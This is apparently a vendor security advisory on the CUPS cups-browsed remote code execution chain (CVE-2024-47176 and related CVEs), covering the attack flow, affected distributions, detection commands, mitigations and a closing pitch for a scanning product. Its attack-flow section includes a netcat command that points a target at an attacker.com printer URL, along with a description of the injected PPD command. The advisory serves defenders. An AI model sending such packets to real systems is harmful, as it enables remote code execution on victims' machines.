CVE-2024-47176: CUPS Linux RCE — 300K Internet-Exposed Systems
A chain of four CUPS vulnerabilities (CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177) enables unauthenticated remote code execution on Linux systems running cups-browsed. Over 300,000 systems were internet-exposed at disclosure. Affects Ubuntu, Debian, Red Hat, Fedora, and most Linux distributions by default.
| Attribute | Value |
|---|---|
| Primary CVE | CVE-2024-47176 |
| Related CVEs | CVE-2024-47076, -47175, -47177 |
| CVSS Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-20: Improper Input Validation |
| Published | September 26, 2024 |
| Exploitation | Public PoC — opportunistic scanning observed |
What Is CVE-2024-47176?
CUPS (Common Unix Printing System) is the default printing infrastructure on Linux and macOS. The cups-browsed daemon listens on UDP port 631 for printer announcements on the network. CVE-2024-47176 is the entry point in a four-vulnerability chain: cups-browsed accepts UDP packets from any source, including the internet, without authentication.
By sending a crafted UDP packet to port 631, an attacker can cause the victim's system to connect back to an attacker-controlled "printer." The malicious printer provides a crafted PPD (PostScript Printer Description) file containing embedded commands. When the victim prints anything, those commands execute on their system.
The Full Attack Chain
| CVE | Component | Description |
|---|---|---|
| CVE-2024-47176 | cups-browsed | Binds to UDP 0.0.0.0:631, accepts packets from any IP |
| CVE-2024-47076 | libcupsfilters | IPP attribute values not sanitized when creating PPD files |
| CVE-2024-47175 | libppd | PPD file generation does not sanitize IPP attributes |
| CVE-2024-47177 | cups-filters | FoomaticRIPCommandLine allows arbitrary command execution |
Attack Flow
# Step 1: Attacker sends UDP packet to target:631 echo "0 3 http://attacker.com:8631/printers/evil" | nc -u -w1 target.com 631 # Step 2: cups-browsed fetches IPP attributes from attacker's server # Attacker's server returns malicious printer attributes # Step 3: libcupsfilters/libppd creates PPD with unsanitized attacker data # PPD contains: *cupsFilter: "application/vnd.cups-pdf 0 [attacker-cmd]" # Step 4: Next time any user prints (or admin triggers test print): # FoomaticRIP executes the command from the PPD # Command runs as the lp user (often has significant filesystem access)
⚠ No User Interaction After Setup
The attacker only needs to send one UDP packet to establish the malicious printer. Exploitation is then triggered whenever any user on the system attempts to print — including routine print jobs that may happen hours or days later. On servers, an attacker could also trigger exploitation remotely by sending a print job to the newly installed malicious printer.
Scope of Impact
At the time of disclosure, Shodan and Censys scans identified approximately 300,000 internet-exposed systems with UDP port 631 open. The vulnerability affects virtually every major Linux distribution that ships cups-browsed:
- Ubuntu (cups-browsed enabled by default in desktop editions)
- Debian and derivatives
- Red Hat Enterprise Linux / CentOS / Rocky Linux
- Fedora
- Arch Linux
- Most Linux desktop distributions
macOS is not affected as it uses its own printing stack. However, macOS also uses CUPS internally, so certain configurations may be affected by related issues.
Detection
# Check if cups-browsed is running systemctl status cups-browsed ps aux | grep cups-browsed # Check if UDP 631 is exposed ss -ulnp | grep 631 netstat -ulnp | grep 631 # Check for unexpected printer additions lpstat -a cat /etc/cups/printers.conf | grep -i "deviceuri\|remote" # Look for suspicious PPD files find /etc/cups /var/cache/cups -name "*.ppd" -newer /etc/cups/cups-browsed.conf # Check logs for unexpected IPP connections grep "cups-browsed" /var/log/cups/error_log | grep "Adding\|New printer"
Mitigation
- Stop and disable cups-browsed if not needed:
sudo systemctl stop cups-browsed sudo systemctl disable cups-browsed
- Apply patches: cups-browsed 2.0.1 and cups-filters 2.0.1 address the vulnerabilities. Ubuntu, Debian, and Red Hat released patches within days of disclosure.
- Block UDP port 631 at firewall: Prevent external packets from reaching cups-browsed
sudo iptables -A INPUT -p udp --dport 631 -j DROP sudo ufw deny 631/udp
- Remove FoomaticRIP if not needed: The final RCE step requires foomatic-rip. Removing it (if Foomatic printers are not used) eliminates the code execution capability.
- Audit printer configurations: Remove any unrecognized printer entries from
/etc/cups/printers.conf
💡 Most Servers Are Not Vulnerable: Server installations of Linux typically do not install cups-browsed by default. The higher risk is in Linux workstations and development machines. However, any Linux system that has been configured for printing should be audited.
KENSAI Detection Capability
- UDP port scanning: KENSAI identifies internet-exposed UDP 631 services across your external attack surface
- Service fingerprinting: Identifies CUPS version and cups-browsed presence from network responses
- Internal network scanning: KENSAI's internal scanner identifies cups-browsed running on internal Linux workstations and servers
- Package version detection: Agent-based scanning identifies vulnerable CUPS package versions on Linux endpoints
- Remediation guidance: Step-by-step remediation instructions with OS-specific commands for your distribution
How Many Linux Systems in Your Environment Have cups-browsed Exposed?
KENSAI scans your internal and external attack surface for CUPS vulnerabilities across all Linux systems. Get the full picture in minutes.
Find CUPS Exposure →